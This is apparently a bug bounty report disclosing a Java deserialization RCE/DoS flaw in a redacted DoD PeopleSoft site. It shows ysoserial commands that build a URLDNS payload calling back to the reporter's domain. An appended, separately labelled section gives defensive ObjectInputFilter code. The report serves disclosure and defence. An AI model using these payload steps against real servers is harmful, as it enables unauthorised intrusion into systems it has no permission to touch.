Remote Code Execution (RCE) in a DoD website

joaomatosf submitted a report to U.S. Dept Of Defense. March 24, 2018, 2:59am UTC

SUMMARY:

The DoD https://███/psc/EXPROD/ Web System uses the Oracle PeopleSoft platform, which is vulnerable to Remote Code Execution (RCE) and Denial of Service (DoS) attacks over a Java Object Deserialization (CWE-502) in the "monitor" service. Thus an attacker can generate and send malicious Java objects of special types to your system and achieve arbitrary effects (such as RCE or DoS) during their deserialization (the objects are deserialized by the readObject() method without any type of validation). This is related to CVE-2017-10366 [1].

PROOF OF CONCEPT

For the PoC I sent a special serialized Java object in order to force the vulnerable server to perform a DNS lookup for a domain controlled by me (dod.jexboss.info). In this way, if the code is executed successfully by the DoD server, I will receive a DNS query from DoD and see it in the logs of my BIND daemon (the vulnerable DoD server will perform a local DNS query for dod.jexboss.info, and the local DNS will try to query the authoritative nameserver for the jexboss.info domain (ns1.jexboss.info), which is mine). For more details about the payload used, see [2].

Attached is a video detailing the PoC.

Generating the payload: to generate the payload I used the tool ysoserial.

```shell
$ git clone https://github.com/frohoff/ysoserial.git
$ cd ysoserial
$ mvn clean package -DskipTests
$ cd target
$ java -jar ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http://dod.jexboss.info > payload
```
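As an added illustration of the missing type validation the report describes (this is not the report's, Oracle's or PeopleSoft's code): the same readObject() call with and without a JEP 290 ObjectInputFilter, assuming a hypothetical MonitorMessage class as the only type the service is supposed to receive.

```java
import java.io.*;

// Added example: a serialization filter (JEP 290, Java 9+, backported to 8u121+)
// turns "readObject() accepts any Serializable class on the classpath" into
// "readObject() accepts only the expected type". The report's payload relies on
// the former; with the latter the stream is rejected before any gadget class
// is instantiated.
public class DeserializationFilterDemo {

    // Hypothetical placeholder for the one message type the service expects.
    public static final class MonitorMessage implements Serializable {
        private static final long serialVersionUID = 1L;
        final String status;
        MonitorMessage(String status) { this.status = status; }
        @Override public String toString() { return "MonitorMessage(" + status + ")"; }
    }

    // Vulnerable pattern: whatever class the byte stream names gets reconstructed.
    static Object readUnfiltered(byte[] bytes) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
            return in.readObject();
        }
    }

    // Hardened pattern: allow-list the expected class (and String, which newer JDKs
    // also pass through the filter), reject everything else with "!*", and cap
    // depth, array size and reference count so a crafted graph cannot exhaust
    // memory (the DoS case in the report).
    static Object readFiltered(byte[] bytes) throws IOException, ClassNotFoundException {
        ObjectInputFilter filter = ObjectInputFilter.Config.createFilter(
            "DeserializationFilterDemo$MonitorMessage;java.lang.String;!*;"
            + "maxdepth=5;maxarray=1024;maxrefs=100");
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
            in.setObjectInputFilter(filter);
            return in.readObject(); // throws InvalidClassException on a rejected class
        }
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bos)) { out.writeObject(o); }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        byte[] expected = serialize(new MonitorMessage("ok"));
        // A plain HashMap stands in for "any class the server did not ask for".
        byte[] unexpected = serialize(new java.util.HashMap<String, Integer>());
        System.out.println("unfiltered accepts: " + readUnfiltered(unexpected).getClass());
        System.out.println("filtered accepts:   " + readFiltered(expected));
        try { readFiltered(unexpected); }
        catch (InvalidClassException e) { System.out.println("filtered rejects:   " + e.getMessage()); }
    }
}
```

For a product you do not control, such as PeopleSoft here, the equivalent control is the vendor patch plus the process-wide `jdk.serialFilter` system property, which applies the same pattern syntax to every ObjectInputStream in the JVM.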